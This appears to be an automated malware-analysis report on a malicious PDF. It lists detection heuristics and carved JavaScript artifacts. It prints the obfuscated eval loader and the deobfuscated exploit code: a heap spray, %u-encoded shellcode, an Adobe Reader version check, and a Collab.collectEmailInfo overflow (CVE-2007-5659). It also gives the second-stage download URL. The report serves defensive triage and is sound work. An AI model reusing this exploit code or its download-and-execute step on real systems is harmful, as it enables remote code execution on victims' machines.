Malware Insights
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval(), which is commonly used to deobfuscate and execute malicious code. The extracted JavaScript stream, named javascript_obj0013_001.js, is heavily obfuscated, making its exact function difficult to determine, but the presence of eval() strongly implies it's intended to download and execute a second-stage payload. The file's authoring application is Scribus, which is not inherently suspicious, but the embedded, obfuscated JavaScript is a significant indicator of malicious intent.
Machine Learning
- Nyx PDF Classifier: malicious score 1.0000
Heuristics (8)
- Collab.collectEmailInfo — CVE-2007-5659 (critical, CVE exact, CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
- JavaScript action (low, 3 related findings, PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical, PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script: function VfJOa(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function uF7295nWabJ(HZL8YcEEFHhgWq){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(HZL8YcEEFHhgWq)"+";"+"}");eval("function YuAiv8F6Sa2(fKbqo){var kc4TRE0Sg5q="+"0,bH5TTZpOf=fKbqo.l"+"en"+"gth,uwwLq75mEJrg=10"+"2"+"4,B0tDlk2NAJRdn,CChzwdwHU,GGGe8xY1='',AEsCGFNZh=kc4TRE0Sg5q,ViUaPUW4=kc4TRE0Sg5q,JXS0ojowgMxno=kc4TRE0Sg5q,y2RvO2cPOLt=Ar"+"ra"+"y(63 …
- PDF exploit shellcode contains an embedded download URL (high, PDF_JS_SHELLCODE_DOWNLOAD_URL): Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream (low, PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Generic recovered JavaScript exploit stage (high, PDF_GENERIC_STAGE_RECOVERY): Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://abb192.cn/exp/load.php?id=3115&spl=4 (referenced by PDF JavaScript)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0013_001.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x363 | 6618 bytes |

SHA-256: 57ad9c449ff78eca758055b21eee99a8aa1314e6c4d156b0d5846fb5295b3a62

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 4 eval/decoder/string-building tokens)

Preview script (first 1,000 lines of the extracted script)
| Filename | Kind | Source | Size |
|---|---|---|---|
| generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x363 | 2638 bytes |

SHA-256: c0231cb35b4a72ecb1429c0c272d34a5794028ea537bed4226ec20e2f540c106

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 3 eval/decoder/string-building tokens)

Preview script (first 1,000 lines of the extracted script)
var E5ChfC0nynKR = new Array(); function EdyXMt(w75EL8teVU4DZG, tS53RsN) { while (w75EL8teVU4DZG.length*2<tS53RsN){w75EL8teVU4DZG += w75EL8teVU4DZG;} w75EL8teVU4DZG = w75EL8teVU4DZG.substring(0,tS53RsN/2); return w75EL8teVU4DZG; } function yTVw1sp7qwA5HI() { var joSy22FxGh2J9u = 0x0c0c0c0c; var Jr0Xn = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u652F%u7078%u6C2F%u616F%u2E64%u6870%u3F70%u6469%u333D%u3131%u2635%u7073%u3D6C%u0034"); var rZlkanzX4hZM = 0x400000; var o3rLCO0No = Jr0Xn.length * 2; var tS53RsN = rZlkanzX4hZM - (o3rLCO0No+0x38); var w75EL8teVU4DZG = unescape("%u9090%u9090"); w75EL8teVU4DZG = EdyXMt(w75EL8teVU4DZG, tS53RsN); var l6L8PCsjyRU = (joSy22FxGh2J9u - 0x400000)/rZlkanzX4hZM; for (var 
QdHGZSKqk=0;QdHGZSKqk<l6L8PCsjyRU;QdHGZSKqk++) { E5ChfC0nynKR[QdHGZSKqk] = w75EL8teVU4DZG + Jr0Xn; } } function VHiaL() { var AiGek8 = app.viewerVersion.toString(); AiGek8 = AiGek8.replace(/\D/g,""); var YW0LLw1QI9qU1Z = new Array(AiGek8.charAt(0),AiGek8.charAt(1),AiGek8.charAt(2)); if ((YW0LLw1QI9qU1Z[0] == 8 && ((YW0LLw1QI9qU1Z[1] == 1 && YW0LLw1QI9qU1Z[2] < 2) || YW0LLw1QI9qU1Z[1] < 1)) || (YW0LLw1QI9qU1Z[0] == 7 && YW0LLw1QI9qU1Z[1] < 1) || (YW0LLw1QI9qU1Z[0] < 7)) { yTVw1sp7qwA5HI(); var N4CVLu6hL = unescape("%u0c0c%u0c0c"); while(N4CVLu6hL.length < 44952) N4CVLu6hL += N4CVLu6hL; this.collabStore = Collab.collectEmailInfo({subj: "",msg: N4CVLu6hL}); } } VHiaL();